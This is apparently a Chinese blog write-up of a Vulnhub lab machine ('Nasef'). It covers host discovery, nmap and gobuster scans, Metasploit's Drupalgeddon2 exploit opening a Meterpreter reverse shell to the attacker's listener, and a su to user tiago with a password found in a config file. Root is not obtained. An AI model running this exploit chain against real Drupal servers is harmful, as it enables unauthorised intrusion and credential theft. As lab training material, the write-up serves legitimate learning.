首页 > 其他分享 >Vulnhub之Nasef靶机详细测试过程(未能Root)

Vulnhub之Nasef靶机详细测试过程(未能Root)

时间:2023-02-04 11:57:26浏览次数:47  
标签:192.168 Disallow x20 Vulnhub Allow Nasef txt Root SF

Nasef

靶机信息

名称:Nasef1: Locating Target

地址:


识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Nase]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:76:42:e1      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.193  08:00:27:da:2a:63      1      60  PCS Systemtechnik GmbH    

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.193

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Nase]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.193 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 20:18 EST
Nmap scan report for 192.168.56.193
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46b199607d81693cae1fc7ffc366e310 (DSA)
|   2048 f3e888f22dd0b2540b9cad6133595593 (RSA)
|   256 ce632af7536e46e2ae81e3ffb716f452 (ECDSA)
|_  256 c655ca073765e306c1d65b77dc23dfcc (ED25519)
80/tcp   open  http?
| fingerprint-strings: 
|   NULL: 
|     _____ _ _ 
|     |_|/ ___ ___ __ _ ___ _ _ 
|     \x20| __/ (_| __ \x20|_| |_ 
|     ___/ __| |___/ ___|__,_|___/__, ( ) 
|     |___/ 
|     ______ _ _ _ 
|     ___(_) | | | |
|     \x20/ _` | / _ / _` | | | |/ _` | |
|_    __,_|__,_|_| |_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Lampi\xC3\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.93%I=7%D=2/3%Time=63DDB271%P=x86_64-pc-linux-gnu%r(NULL,
SF:10F8,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\|_\x20\x20\x20_\|\x20\|\x20\(\x2
SF:0\)\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n\x20\x20\|\x20\|\x20\|\x20\|_\|/\x20___\x20\x20\x20\x20___\x20\x20_
SF:_\x20_\x20___\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\
SF:x20\x20\|\x20\|\x20\|\x20__\|\x20/\x20__\|\x20\x20/\x20_\x20\\/\x20_`\x
SF:20/\x20__\|\x20\|\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20_\|
SF:\x20\|_\|\x20\|_\x20\x20\\__\x20\\\x20\|\x20\x20__/\x20\(_\|\x20\\__\x2
SF:0\\\x20\|_\|\x20\|_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\\___/\x20\\__\|\
SF:x20\|___/\x20\x20\\___\|\\__,_\|___/\\__,\x20\(\x20\)\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20__/\x20\|/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|___/\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\n______\x20_\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\n\|\x20\x20___\(_\)\x20\x20\x2
SF:0\x20\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\|\n\|
SF:\x20\|_\x20\x20\x20_\x20\x20\x20\x20__\|\x20\|_\x20\x20\x20_\x20_\x20__
SF:\x20___\x20\x20\x20__\x20_\x20\x20\x20\x20___\x20\x20__\x20_\x20_\x20\x
SF:20\x20_\x20\x20__\x20_\|\x20\|\n\|\x20\x20_\|\x20\|\x20\|\x20\x20/\x20_
SF:`\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20\\\x20/\x20_`\x20\|\x20\x2
SF:0/\x20_\x20\\/\x20_`\x20\|\x20\|\x20\|\x20\|/\x20_`\x20\|\x20\|\n\|\x20
SF:\|\x20\x20\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|_\|\x20\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|\x20\x20__/\x20\(_\|\x20\|\x20\|_
SF:\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|\\__,
SF:_\|_\|\x20\|_\|");
MAC Address: 08:00:27:DA:2A:63 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.41 seconds

NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP?)、1898(HTTP)

获得Shell

80端口似乎http版本不是标准的1.0/1.1,未能获取有价值的信息。

访问1898端口,从返回内容得知:CMS为drupal

┌──(kali㉿kali)-[~/Vulnhub/Nase]
└─$ curl http://192.168.56.193:1898/robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
                                       
┌──(kali㉿kali)-[~/Vulnhub/Nase]
└─$ gobuster dir -u http://192.168.56.193:1898 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.193:1898
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,sh,php,html
[+] Timeout:                 10s
===============================================================
2023/02/03 21:01:01 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 287]
/misc                 (Status: 301) [Size: 321] [--> http://192.168.56.193:1898/misc/]
/.html                (Status: 403) [Size: 288]
/themes               (Status: 301) [Size: 323] [--> http://192.168.56.193:1898/themes/]
/modules              (Status: 301) [Size: 324] [--> http://192.168.56.193:1898/modules/]
/index.php            (Status: 200) [Size: 11446]
/scripts              (Status: 301) [Size: 324] [--> http://192.168.56.193:1898/scripts/]
/sites                (Status: 301) [Size: 322] [--> http://192.168.56.193:1898/sites/]
/includes             (Status: 301) [Size: 325] [--> http://192.168.56.193:1898/includes/]
/install.php          (Status: 200) [Size: 3291]
/profiles             (Status: 301) [Size: 325] [--> http://192.168.56.193:1898/profiles/]
/update.php           (Status: 403) [Size: 4159]
/README.txt           (Status: 200) [Size: 5382]
/robots.txt           (Status: 200) [Size: 2189]
/INSTALL.txt          (Status: 200) [Size: 17995]
/cron.php             (Status: 403) [Size: 7428]
/LICENSE.txt          (Status: 200) [Size: 18092]
/CHANGELOG.txt        (Status: 200) [Size: 110781]
/xmlrpc.php           (Status: 200) [Size: 42]
/COPYRIGHT.txt        (Status: 200) [Size: 1481]
/.html                (Status: 403) [Size: 288]
/.php                 (Status: 403) [Size: 287]
/UPGRADE.txt          (Status: 200) [Size: 10123]
/server-status        (Status: 403) [Size: 296]
/authorize.php        (Status: 403) [Size: 2926]
Progress: 1101803 / 1102805 (99.91%)===============================================================
2023/02/03 21:04:08 Finished
===============================================================

从/CHANGELOG.txt文件得知目标主机drupal的版本为7.54,查询相关漏洞利用代码,可知可用Metasploit框架执行,查询drupal后得到若干模块,然后依次尝试,尝试第2个时成功得到Meterpreter

msf6 > use  exploit/unix/webapp/drupal_coder_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/webapp/drupal_coder_exec) > show options 

Module options (exploit/unix/webapp/drupal_coder_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
                                         etasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/drupal_coder_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.193
RHOSTS => 192.168.56.193
msf6 exploit(unix/webapp/drupal_coder_exec) > set RPORT 1898
RPORT => 1898
msf6 exploit(unix/webapp/drupal_coder_exec) > 
msf6 exploit(unix/webapp/drupal_coder_exec) > exploit

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/drupal_coder_exec) >  use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using
                                           -Metasploit
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.56.193
RHOSTS => 192.168.56.193
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > 
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.56.193
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.193:53106) at 2023-02-03 21:08:19 -0500

meterpreter > 

meterpreter > shell
Process 4528 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ 

提权

将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,执行该脚本:

╔══════════╣ Searching passwords in history files
                                                                                                                              
╔══════════╣ Searching passwords in config PHP files
      'password' => 'Virgulino',                                                                                              
 *     'password' => 'password',
 *   'password' => 'password',


猜测上述密码率属于用户tiago,尝试一下切换,成功得到tiago的shell

www-data@lampiao:/home$ su - tiago
su - tiago
Password: Virgulino

tiago@lampiao:~$ 

tiago@lampiao:~$ id
id
uid=1000(tiago) gid=1000(tiago) groups=1000(tiago)
tiago@lampiao:~$ sudo -l
sudo -l
[sudo] password for tiago: Virgulino

Sorry, user tiago may not run sudo on lampiao.
tiago@lampiao:~$ 

tiago@lampiao:/tmp$ uname -a
uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
tiago@lampiao:/tmp$ 

尝试了各种本地提权漏洞利用代码,但是都是失败。

标签:192.168,Disallow,x20,Vulnhub,Allow,Nasef,txt,Root,SF
From: https://www.cnblogs.com/jason-huawen/p/17091209.html

相关文章